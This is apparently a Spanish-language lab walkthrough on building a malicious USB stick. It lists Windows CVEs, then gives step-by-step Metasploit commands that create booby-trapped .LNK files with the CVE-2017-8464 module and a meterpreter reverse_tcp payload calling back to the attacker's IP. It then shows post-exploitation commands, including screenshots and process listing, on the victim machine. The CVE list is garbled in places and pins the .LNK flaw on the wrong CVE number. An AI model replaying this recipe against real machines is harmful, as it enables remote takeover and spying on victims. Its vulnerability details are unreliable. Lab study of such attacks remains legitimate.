Crear un USB malicioso --
La vulnerabilidad consiste en crear un USB malicioso para poder realizar un ataque a otra maquina.
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
con el anterior comando se crean los archivos infectados y luego se procede a realizar el ataque introduciendo
la memoria infectada en la maquina victima. 

Sistemas operativos:
windows 7
windows 8.1
windows RT 8.1
Windows server 2008:sp2
windows server 2008 R2:sp1
windows server 2012
windows server 2012 R2
windows server 2016
windows_10:1511
windows_10:1607
windows_10:1703
windows_7:sp1
windows_8

Software 
Tipo de producto: sistema operativo
Se usa Microsoft con distintas versiones de Windows. 
cpe:2.3:o:microsoft:windows_10:1511
cpe:2.3:o:microsoft:windows_10:1607
cpe:2.3:o:microsoft:windows_10:1703
cpe:2.3:o:microsoft:windows_7:-:sp1
cpe:2.3:o:microsoft:windows_8
cpe:2.3:o:microsoft:windows_8.1
cpe:2.3:o:microsoft:windows_8.1:rt
cpe:2.3:o:microsoft:windows_server_2008:*:sp2
cpe:2.3:o:microsoft:windows_server_2008:r2:sp1
cpe:2.3:o:microsoft:windows_server_2012
cpe:2.3:o:microsoft:windows_server_2012:r2
 cpe:2.3:o:microsoft:windows_server_2016

Vulnerabilidades 

Windows 10 1511 
CVE ID: CVE-2018-8251 
CWE ID: 119 
Vulnerability type:Overflow Mem. Corr.
A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory,
aka "Media Foundation Memory Corruption Vulnerability." This affects Windows 7, Windows Server 2012 R2,
Windows RT 8.1, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

CVE ID: 	CVE-2018-8124
CWE ID: 264
Vulnerability type:Overflow Mem. Corr.
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly
handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 7, 
Windows Server 2012 R2, Windows RT 8: 	CVE-2019-0583.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016,
Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8120, CVE-2018-8164, CVE-2018-8166.

CVE ID: 	CVE-2018-8116
CWE ID: 119
Vulnerability type:DoS Overflow
A denial of service vulnerability exists in the way that Windows handles objects in memory, 
aka "Microsoft Graphics Component Denial of Service Vulnerability." This affects Windows 7,
Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1,
Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

Windows 10 1607: 
CVE ID: CVE-2019-0584
CWE ID: 	119
Vulnerability type:Overflow Mem. Corr.
A remote code execution vulnerability exists when the Windows Jet Database Engine improperly 
handles objects in memory, aka "Jet Database Engine Remote Code Execution Vulnerability." 
This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, 
Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. 
This CVE ID is unique from CVE-2019-0538, CVE-2019-0575, CVE-2019-0576, CVE-2019-0577, CVE-2019-0578, CVE-2019-0579, 
CVE-2019-0580, CVE-2019-0581, CVE-2019-0582, CVE-2019-0583.

CVE ID: 	CVE-2019-0583
CWE ID: 119
Vulnerability type:Overflow Mem. Corr.
A remote code execution vulnerability exists when the Windows Jet Database Engine improperly 
handles objects in memory, aka "Jet Database Engine Remote Code Execution Vulnerability."
This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019,
Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
This CVE ID is unique from CVE-2019-0538, CVE-2019-0575, CVE-2019-0576, CVE-2019-0577, CVE-2019-0578, CVE-2019-0579, 
CVE-2019-0580, CVE-2019-0581, CVE-2019-0582, CVE-2019-0584.

CVE ID:	CVE-2019-0582
CWE ID: 119
Vulnerability Type(s): Exec Code Overflow: 	119	
A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, 
aka "Jet Database Engine Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1,
Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10,
Windows 10 Servers. This CVE ID is unique from CVE-2019-0538, CVE-2019-0575, CVE-2019-0576, CVE-2019-0577, CVE-2019-0578, CVE-2019-0579,
CVE-2019-0580, CVE-2019-0581, CVE-2019-0583, CVE-2019-0584.

Windows 7 SP1
CVE ID: 	CVE-2019-0584
CWE ID: 	119	
Vulnerability Type(s): Exec Code Overflow
A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, 
aka "Jet Database Engine Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1,
Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10,
Windows 10 Servers. This CVE ID is unique from CVE-2019-0538, CVE-2019-0575, CVE-2019-0576, CVE-2019-0577, CVE-2019-0578, CVE-2019-0579,
CVE-2019-0580, CVE-2019-0581, CVE-2019-0582, CVE-2019-0583.

CVE ID: 	CVE-2019-0583
CWE ID: 119
Vulnerability Type(s): Exec Code Overflow
A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory,
aka "Jet Database Engine Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1,
Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10,
Windows 10 Servers. This CVE ID is unique from CVE-2019-0538, CVE-2019-0575, CVE-2019-0576, CVE-2019-0577, CVE-2019-0578, CVE-2019-0579,
CVE-2019-0580, CVE-2019-0581, CVE-2019-0582, CVE-2019-0584.

CVE ID: 	CVE-2019-0582
CWE ID: 119
Vulnerability Type(s): Exec Code Overflow
A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, 
aka "Jet Database Engi: 	200ne Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1,
Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10,
Windows 10 Servers. This CVE ID is unique from CVE-2019-0538, CVE-2019-0575, CVE-2019-0576, CVE-2019-0577, CVE-2019-0578, CVE-2019-0579,
CVE-2019-0580, CVE-2019-0581, CVE-2019-0583, CVE-2019-0584.

Windows 8
CVE ID: 	CVE-2018-7250
CWE ID: 	200
Vulnerability Type(s): +Info
An issue was discovered in secdrv.sys as shipped in Microsoft Windows Vista, Windows 7, 
Windows 8, and Windows 8.1 before KB3086255, and as shipped in Macrovision SafeDisc. An uninitialized kernel pool allocation in
IOCTL 0xCA002813 allows a local unprivileged attacker to leak 16 bits of uninitialized kernel PagedPool data.

CVE ID: CVE-2018-7249
CWE ID: 		416
Vulnerability Type(s): DoS +Priv
An issue was discovered in secdrv.sys as shipped in Microsoft Windows Vista, Windows 7, 
Windows 8, and Windows 8.1 before KB3086255, and as shipped in Macrovision SafeDisc. Two carefully timed calls 
to IOCTL 0xCA002813 can cause a race condition that leads to a use-after-free. When exploited, an unprivileged attacker
can run arbitrary code in the kernel.

CVE ID: 		CVE-2018-6947
CWE ID: 264
Vulnerability Type(s): 	Exec Code
Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, 
Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 
allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly 
handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka "LNK 
Remote Code Execution Vulnerability."


Explicación Práctica

1- Abrir Kali y abrir CMD
2- Instalar una maquina virtual de Windows, no se puede utilizar windows XP
3- Abrir la maquina virtual que se instaló de Windows
4- Abrir la consola en kali
msfconsole
5- hacer exploit
msf5>use exploit/multi/handler (crear handler para la conexión)
6- msf5 exploit(multi/handler)>set payload windows/x64/meterpreter/reverse_tcp
7-  msf5 exploit(multi/handler)>set LHOST 10.191.4.4(mi ip kali)
8-  msf5 exploit(multi/handler)>show options (para verificar puerto)
9-  msf5 exploit(multi/handler)>exploit -j
10- msf5 exploit(multi/handler)>back
11- msf5>use exploit/windows/fileformat/cve_2017_8464_lnk_rce (creo los archivos)
12- msf5 exploit(windows/fileformat/cve_2017_8464_lnk_rce)>info
13-msf5 exploit(windows/fileformat/cve_2017_8464_lnk_rce)>set payload windows/x64/meterpreter/reverse_tcp
14- msf5 exploit(windows/fileformat/cve_2017_8464_lnk_rce)>set LHOST 10.191.4.4
15-msf5 exploit(windows/fileformat/cve_2017_8464_lnk_rce)>show options
16- msf5 exploit(windows/fileformat/cve_2017_8464_lnk_rce)>exploit
(visualizo los archivos creados)
17- abro otra consola 
xdg-opne /root/.msf4/local/
(abro la capreta donde se crean los archivos)
18- copio los archivos creados en la memoria usb y expulso la memoria de kali
19- abro la memoria en windows 7
20- se inicia la sesión
21- sessions -i 1
22- procedo a realizar ataque. 
23- meterpreter>ls
podemos visualizar los archivos en el directorio remoto actual
24- meterpreter>ipconfig 
podemos visualizar toda la información de todas las tarjetas de red existente en la maquina
25- meterpreter>getprivs
con getuid podemos consultar el tipo de usuario que la maquina victima está ejecutabdo
26-meterpreter>getuid
podemos consultar el usuario que la victima está ejecutando
27-meterpreter>ps 
podemos ver los procesos que se están ejecutando
27-meterpreter>sysinfo
obtenemos información del sistema:
nombre maquina, sistema operativo, tipo de arquitectura
28- meterpreter>idletime
permite consultar el tiempo en el que el usuario de la maquina victima ha estado ausente
29- meterpreter>screenshot
extraemos una imagen de la maquina victima 
se comparan la imagenes y se puede notar que hizo captura de la pantalla donde se encontraba el usuario 














